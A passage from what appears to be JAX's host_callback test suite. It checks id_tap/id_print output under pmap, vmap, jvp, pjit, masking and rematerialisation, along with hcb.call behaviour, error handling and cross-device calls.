self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
if FLAGS.jax_host_callback_ad_transforms:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
else:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[200.00 202.00 204.00]
[220.00 222.00 224.00]]""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
@unittest.skip("cond of pmap does not work in JAX. Issue #5178.")
def test_tap_cond_pmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(jax.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
jax.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
testing_stream.output)
else:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
def test_tap_remat_0(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, jax.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
use_result=use_result, use_remat=use_remat, grad_func=grad_func)
for use_result in [True, False]
for grad_func in ["grad", "value_and_grad"]
for use_remat in ["old", "new", "none"]))
def test_tap_remat(self, use_result=False, grad_func="grad", use_remat="new"):
def f(x):
id_print_result = hcb.id_print(x, output_stream=testing_stream)
if use_result:
x = id_print_result
return 3. * x
grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
if use_remat == "old":
trans_f = jax.remat(f)
elif use_remat == "new":
trans_f = ad_checkpoint.checkpoint(f)
else:
assert use_remat == "none"
trans_f = f
print(jax.make_jaxpr(grad_f(trans_f))(2.))
grad_f(trans_f)(2.)
hcb.barrier_wait()
if use_remat == "none":
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
transforms: ['jvp', 'transpose']
3."""
else:
# GOOD: whether or not we use_result, in absence of
# jax_host_callback_ad_transforms we get the same callback.
expected = "2."
else:
expected = "2."
else: # use_remat
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
2.
transforms: ['jvp', 'transpose']
3."""
else:
expected = """
2.
2."""
else:
if use_remat == "old":
# TODO: we should see two callbacks
expected = ""
else:
# Good: we see two callbacks, whether or not we use the result.
expected = """
2.
2."""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
def test_primitive_compilation(self):
def f_outside(x):
return 2 * x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
with jtu.count_primitive_compiles() as count:
for _ in range(3):
self.assertAllClose(2 * arg, fun(arg))
self.assertEqual(count[0], 1)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = self.rng().choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
@jtu.skip_on_devices("gpu")
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return jax.jit(jax_outside_fun)(jax.device_put(arg, device))
@jax.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=jax.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = jax.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert jax.devices("cpu")
self.outside_device = jax.devices("cpu")[0]
else:
if len(jax.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = jax.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = jax.grad(f_jax)(3.)
self.assertAllClose(res_jax, jax.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = jax.grad(f_jax)(x)
self.assertAllClose(res_jax, jax.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = jax.grad(jax.grad(f_jax))(5.)
res_outside = jax.grad(jax.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
